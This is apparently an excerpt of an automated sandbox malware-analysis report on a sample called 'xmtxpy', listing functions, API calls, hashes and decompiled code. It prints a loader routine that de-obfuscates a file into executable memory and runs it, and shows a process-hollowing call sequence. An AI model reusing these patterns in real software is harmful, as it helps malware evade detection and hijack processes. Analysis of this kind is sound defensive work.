                            • Part of subcall function 008AE9B0: __FF_MSGBANNER.LIBCMT ref: 008AE9BC
                            • Part of subcall function 008AE9B0: __NMSG_WRITE.LIBCMT ref: 008AE9C4
                          • _fast_error_exit.LIBCMT ref: 008AE8E0
                          • __RTC_Initialize.LIBCMT ref: 008AE8E6
                          • __ioinit.LIBCMT ref: 008AE8EF
                          • _fast_error_exit.LIBCMT ref: 008AE8FA
                          • GetCommandLineW.KERNEL32 ref: 008AE900
                          • ___crtGetEnvironmentStringsW.LIBCMT ref: 008AE90B
                          • __wsetargv.LIBCMT ref: 008AE915
                          • __wsetenvp.LIBCMT ref: 008AE926
                          • __cinit.LIBCMT ref: 008AE939
                          • __wwincmdln.LIBCMT ref: 008AE94A
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID:
                          • API String ID: 965155184-0
                          • Opcode ID: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction ID: 1f4328fb1270815b40bd831efc690f2a02e652aff3e1c4de0287aedc37cef172
                          • Opcode Fuzzy Hash: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction Fuzzy Hash: B111BC20204316AAFA607BF89C46B6B2A44FF13354F240C7AFA40DACC3EFA9C4415223
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0012102F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 12102f-1210dd call 1206c7 call 120776 * 7 181 1210e0-1210e4 164->181 182 1210e6-1210fa 181->182 183 1210fc-121109 181->183 182->181 184 12110c-121110 183->184 185 121112-121126 184->185 186 121128-121144 184->186 185->184 188 121146-121149 186->188 189 12114e-121178 CreateProcessW 186->189 190 1212f1-1212f4 188->190 192 121182-12119b 189->192 193 12117a-12117d 189->193 195 1211a5-1211bf ReadProcessMemory 192->195 196 12119d-1211a0 192->196 193->190 197 1211c1-1211c4 195->197 198 1211c9-1211d2 195->198 196->190 197->190 199 1211d4-1211e3 198->199 200 1211fc-12121c VirtualAllocEx 198->200 199->200 203 1211e5-1211f2 call 120368 199->203 201 121226-12123e call 120267 200->201 202 12121e-121221 200->202 209 121240-121243 201->209 210 121248-12124c 201->210 202->190 203->200 208 1211f4-1211f7 203->208 208->190 209->190 211 121255-12125f 210->211 212 121261-12128f call 120267 211->212 213 121296-1212b2 call 120267 211->213 217 121294 212->217 218 1212b4-1212b7 213->218 219 1212b9-1212d7 Wow64SetThreadContext 213->219 217->211 218->190 221 1212d9-1212dc 219->221 222 1212de-1212e1 call 1201b6 219->222 221->190 224 1212e6-1212e8 222->224 225 1212ea-1212ed 224->225 226 1212ef 224->226 225->190 226->190
                          APIs
                          • CreateProcessW.KERNEL32(?,00000000), ref: 00121173
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: D
                          • API String ID: 963392458-2746444292
                          • Opcode ID: 397473f0824e4f4b43b6733d8b0170529a92fdd24fe94099af0223697035be09
                          • Instruction ID: 47c85d2145c5a002aae2e457d77010389c8a879f09c1682aa40106225ae0a023
                          • Opcode Fuzzy Hash: 397473f0824e4f4b43b6733d8b0170529a92fdd24fe94099af0223697035be09
                          • Instruction Fuzzy Hash: 1BA1E270E00229EFDB45DFA4D981BAEBBB9AF18344F2040A5F515EB251E730AE61DF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001207DD Relevance: 7.7, APIs: 5, Instructions: 180fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 227 1207dd-12097e call 1206c7 call 120776 * 10 CreateFileW 253 120982-120991 227->253 254 120980 227->254 257 120993 253->257 258 120995-1209ab VirtualAlloc 253->258 255 1209e8-1209eb 254->255 257->255 259 1209af-1209c3 ReadFile 258->259 260 1209ad 258->260 261 1209c7-1209e5 CloseHandle call 1209ec call 120d07 ExitProcess 259->261 262 1209c5 259->262 260->255 262->255
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00120974
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ac7005fe80b879d05ba83b6e2beb36413be2e8daa0394d11c94bb7434414d37e
                          • Instruction ID: 5d2e200e62995a1dedab7298b5e95af07a1849fe8c11a20e762fbbc88bff6d37
                          • Opcode Fuzzy Hash: ac7005fe80b879d05ba83b6e2beb36413be2e8daa0394d11c94bb7434414d37e
                          • Instruction Fuzzy Hash: DF617D35E40318EBEF51DBE4E852BEEB7B5AF48710F20811AE119FA2A1E7701E50DB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A1000 Relevance: 6.2, APIs: 4, Instructions: 168filememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E008A1000(WCHAR* _a12) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _t88;
				void* _t90;

				 *0x8bf0c0 = E008AE6A0(E008AE750(), 0x7554284c);
				_t88 = CreateFileW(_a12, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v20 = _t88;
				_v16 = GetFileSize(_v20, 0);
				_t90 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v12 = _t90;
				ReadFile(_v20, _v12, _v16,  &_v24, 0); // executed
				_v8 = 0;
				while(_v8 < _v16) {
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000ef;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x86;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000002;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000f8;
					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000036;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x93;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x1d;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xca;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x9e;
					 *(_v12 + _v8) =  *((intOrPtr*)(_v12 + _v8)) - 1;
					_v8 =  &(_v8->Internal);
				}
				goto __eax;
			}










                          0x008a1017
                          0x008a1032
                          0x008a1038
                          0x008a1047
                          0x008a1057
                          0x008a105d
                          0x008a1072
                          0x008a1078
                          0x008a108a
                          0x008a10ab
                          0x008a10c2
                          0x008a10d5
                          0x008a10e8
                          0x008a10fb
                          0x008a110e
                          0x008a1122
                          0x008a1139
                          0x008a114c
                          0x008a1160
                          0x008a1177
                          0x008a118b
                          0x008a11a2
                          0x008a11b5
                          0x008a11c8
                          0x008a11df
                          0x008a11f2
                          0x008a1087
                          0x008a1087
                          0x008a11fc

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 008A1032
                          • GetFileSize.KERNEL32(?,00000000), ref: 008A1041
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 008A1057
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008A1072
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: File$AllocCreateReadSizeVirtual
                          • String ID:
                          • API String ID: 4119528295-0
                          • Opcode ID: 00f36e19aa980255eda0a09e8a3703a49ae2a8a586d481ced770fd49409051de
                          • Instruction ID: 512f11380f59e6ff1d6efb79180cb5a40e6d22df8efc7c4ccd5dc9675f03655b
                          • Opcode Fuzzy Hash: 00f36e19aa980255eda0a09e8a3703a49ae2a8a586d481ced770fd49409051de
                          • Instruction Fuzzy Hash: DB819435905188EFDB01CBA8C991BDDBFB1AF56308F2886C4D6416B346C234AF91DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B2397 Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 275 8b2397-8b23a1 276 8b23a3-8b23a4 275->276 277 8b2412-8b2424 call 8b13b0 call 8b10b7 275->277 279 8b23a5-8b23ac 276->279 293 8b2426-8b2428 277->293 281 8b23cb-8b23cd 279->281 282 8b23ae-8b23ca call 8af776 call 8af7d3 call 8aeec1 279->282 283 8b23cf-8b23d1 281->283 284 8b23d3-8b23d5 281->284 282->281 287 8b23d6-8b23e4 RtlAllocateHeap 283->287 284->287 291 8b240c-8b2410 287->291 292 8b23e6-8b23ef 287->292 291->293 295 8b23fe-8b2403 call 8b10b7 292->295 296 8b23f1-8b23fa call 8b13b0 292->296 303 8b2405-8b240a call 8b10b7 295->303 296->279 304 8b23fc 296->304 303->291 304->303
                          C-Code - Quality: 93%
                          			E008B2397(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				long _t18;
				void* _t22;
				long _t25;

				_t23 = __edi;
				_t22 = __edx;
				_t14 = __ebx;
				_t25 = _a4;
				if(_t25 > 0xffffffe0) {
					E008B13B0(_t2, _t25);
					 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				while(1) {
					_t6 =  *0x8bf100; // 0x4f0000
					_t27 = _t6;
					if(_t6 == 0) {
						E008AF776(_t14, _t22, _t23, _t25, _t27);
						E008AF7D3(_t14, _t22, _t23, _t25, 0x1e);
						E008AEEC1(0xff);
						_t6 =  *0x8bf100; // 0x4f0000
					}
					if(_t25 == 0) {
						_t18 = 1;
						__eflags = 1;
					} else {
						_t18 = _t25;
					}
					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
					_t23 = _t7;
					if(_t23 != 0) {
						break;
					}
					_t14 = 0xc;
					if( *0x8bff38 == _t7) {
						 *((intOrPtr*)(E008B10B7(__eflags))) = _t14;
						L12:
						 *((intOrPtr*)(E008B10B7(_t31))) = _t14;
						break;
					}
					_t11 = E008B13B0(_t7, _t25);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t23;
			}











                          0x008b2397
                          0x008b2397
                          0x008b2397
                          0x008b239b
                          0x008b23a1
                          0x008b2413
                          0x008b241e
                          0x008b2424
                          0x00000000
                          0x008b2424
                          0x008b23a3
                          0x008b23a4
                          0x008b23a5
                          0x008b23a5
                          0x008b23aa
                          0x008b23ac
                          0x008b23ae
                          0x008b23b5
                          0x008b23bf
                          0x008b23c4
                          0x008b23ca
                          0x008b23cd
                          0x008b23d5
                          0x008b23d5
                          0x008b23cf
                          0x008b23cf
                          0x008b23cf
                          0x008b23da
                          0x008b23e0
                          0x008b23e4
                          0x00000000
                          0x00000000
                          0x008b23e8
                          0x008b23ef
                          0x008b2403
                          0x008b2405
                          0x008b240a
                          0x00000000
                          0x008b240a
                          0x008b23f2
                          0x008b23f8
                          0x008b23fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008b23fc
                          0x00000000

                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008AF776: __NMSG_WRITE.LIBCMT ref: 008AF79D
                            • Part of subcall function 008AF776: __NMSG_WRITE.LIBCMT ref: 008AF7A7
                          • __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008AF7D3: GetModuleFileNameW.KERNEL32(00000000,008BF452,00000104,00000000,00000000,00000000), ref: 008AF865
                            • Part of subcall function 008AF7D3: ___crtMessageBoxW.LIBCMT ref: 008AF913
                            • Part of subcall function 008AEEC1: ExitProcess.KERNEL32 ref: 008AEED0
                            • Part of subcall function 008B10B7: __getptd_noexit.LIBCMT ref: 008B10B7
                          • RtlAllocateHeap.NTDLL(004F0000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                          • String ID:
                          • API String ID: 3823847927-0
                          • Opcode ID: 2976d310d9c9350f581b8c3a643d41e8fe5cacbedb26f0111a0acf432e56652c
                          • Instruction ID: 1accad8a88c3a7f0b2e10b92a4d715941f6d615b070b797c7b9cc83ab44c0d0f
                          • Opcode Fuzzy Hash: 2976d310d9c9350f581b8c3a643d41e8fe5cacbedb26f0111a0acf432e56652c
                          • Instruction Fuzzy Hash: 5401F931300A519AE6113B3CEC51BAB3398FF5A364B100235F601DBBE2DE748C8185A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 008AFEE1 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008AFEE1(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                          0x008afee6
                          0x008afef6

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 008AFEE6
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 008AFEEF
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 4669e86b246a113407a8bc6e9024439827345310c3821928331a89b46e86ce68
                          • Instruction ID: 9434d9507dacf8d68d9004800195ed528300ed101cbaed64fcbd77a202f26f67
                          • Opcode Fuzzy Hash: 4669e86b246a113407a8bc6e9024439827345310c3821928331a89b46e86ce68
                          • Instruction Fuzzy Hash: 4FB09235048209ABCB002B99EC0DB883F28FB14652F000190F74D440B09B675450AA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AFEB0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008AFEB0(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                          0x008afebd

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 008AFEB6
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: ff93acedd8299f02fb1351f54de61c2be84bc421079d9d6a2595bcc5671559b9
                          • Instruction ID: 0edf7a46ab94998a66a36bce5832ca761cace4635b79ac4e2a23007c63b72b9f
                          • Opcode Fuzzy Hash: ff93acedd8299f02fb1351f54de61c2be84bc421079d9d6a2595bcc5671559b9
                          • Instruction Fuzzy Hash: F6A0113000820CAB8A002B8AEC088C83F2CFA002A2B0000A0FA0C000308B23A8A0AA80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AF18E Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008AF18E() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x8bf100 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                          0x008af18e
                          0x008af196
                          0x008af1a2

                          APIs
                          • GetProcessHeap.KERNEL32(008AE8C9), ref: 008AF18E
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 17e16af48363ad5197fcb3f56f4ce58fa98dabd8bee2a99c3d1be81cff7f9120
                          • Instruction ID: 601e2f135a33e663831fe08d3a140d79dc456c4a19ff11e2076013ac7ba08215
                          • Opcode Fuzzy Hash: 17e16af48363ad5197fcb3f56f4ce58fa98dabd8bee2a99c3d1be81cff7f9120
                          • Instruction Fuzzy Hash: 1CB012B03015028747090B3CBC2410937DCBF18201300423DB603C11B0DF30C4109B00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00120616 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction ID: bd8f9bf8a7deeab3b8d12dea27c3e5602838ef34e7f0f22662be0631a8e4d997
                          • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction Fuzzy Hash: 8D112971A00128AFCB20DBA9E8888AEF7FDEF887907504165F804D3311E370DE60C660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00120706 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction ID: 4b5c252bc03548354cd6320802630407d97c5a25068ab10930cad7fd6147a5fe
                          • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction Fuzzy Hash: 89E09A357606089FCB08CBA8D882D65B3F8EB1C320B114390F819C73A2EB34FE00DA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00120744 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction ID: 89df3e36c5d435bc6314637e616c46a6ecfa34bc23df1f6fdca0373da2976240
                          • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction Fuzzy Hash: 30E086363105608FC322DA19E980852F3E9FB9C3B07154569EC8AD3712C330FC10CA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001206C7 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AE750 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008AE750() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))))) + 0x10));
			}



                          0x008ae763

                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74ec8ed11678ff3a5584b8b4ea8402eaaafd729edba2b9505761833f1e6b03f6
                          • Instruction ID: 28bea104002c5a668ee2f95c3b8a520e3d52d72a39d127a2dfcce5072377f687
                          • Opcode Fuzzy Hash: 74ec8ed11678ff3a5584b8b4ea8402eaaafd729edba2b9505761833f1e6b03f6
                          • Instruction Fuzzy Hash: 47C00179651A40CFCB55CF08D294E01B7F4FB4D750B1644D1E9168B732C234E900DA11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AEDFA Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E008AEDFA(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long* _t12;
				long _t14;
				void* _t19;
				void* _t21;
				void* _t25;
				long* _t26;

				E008AEFA9(_t3, __ebx, __eflags);
				if(E008B02BA() != 0) {
					_t6 = E008AFB16(0x8aeb8b);
					 *0x8be000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t26 = E008B0340(1, 0x3bc);
						asm("lock pop ecx");
						_t19 = _t25;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							E008AEE70();
							__eflags = 0;
							return 0;
						} else {
							_t12 = E008AFB72(_t19,  *0x8be000, _t26);
							_pop(_t21);
							__eflags = _t12;
							if(__eflags == 0) {
								goto L7;
							} else {
								_push(0);
								_push(_t26);
								E008AED47(__ebx, _t21, __edi, _t26, __eflags);
								_t14 = GetCurrentThreadId();
								_t26[1] = _t26[1] | 0xffffffff;
								 *_t26 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E008AEE70();
					return 0;
				}
			}












                          0x008aedfa
                          0x008aee06
                          0x008aee15
                          0x008aee1a
                          0x008aee20
                          0x008aee23
                          0x00000000
                          0x008aee25
                          0x008aee32
                          0x008aee33
                          0x008aee35
                          0x008aee36
                          0x008aee38
                          0x008aee67
                          0x008aee67
                          0x008aee6c
                          0x008aee6f
                          0x008aee3a
                          0x008aee41
                          0x008aee47
                          0x008aee48
                          0x008aee4a
                          0x00000000
                          0x008aee4c
                          0x008aee4c
                          0x008aee4e
                          0x008aee4f
                          0x008aee56
                          0x008aee5c
                          0x008aee60
                          0x008aee64
                          0x008aee66
                          0x008aee66
                          0x008aee4a
                          0x008aee38
                          0x008aee08
                          0x008aee08
                          0x008aee08
                          0x008aee0f
                          0x008aee0f

                          APIs
                          • __init_pointers.LIBCMT ref: 008AEDFA
                            • Part of subcall function 008AEFA9: RtlEncodePointer.NTDLL(00000000,?,008AEDFF,008AE8DA), ref: 008AEFAC
                            • Part of subcall function 008AEFA9: __initp_misc_winsig.LIBCMT ref: 008AEFC7
                            • Part of subcall function 008AEFA9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008AFC2C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008AFC40
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008AFC53
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008AFC66
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008AFC79
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008AFC8C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008AFC9F
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008AFCB2
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008AFCC5
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008AFCD8
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008AFCEB
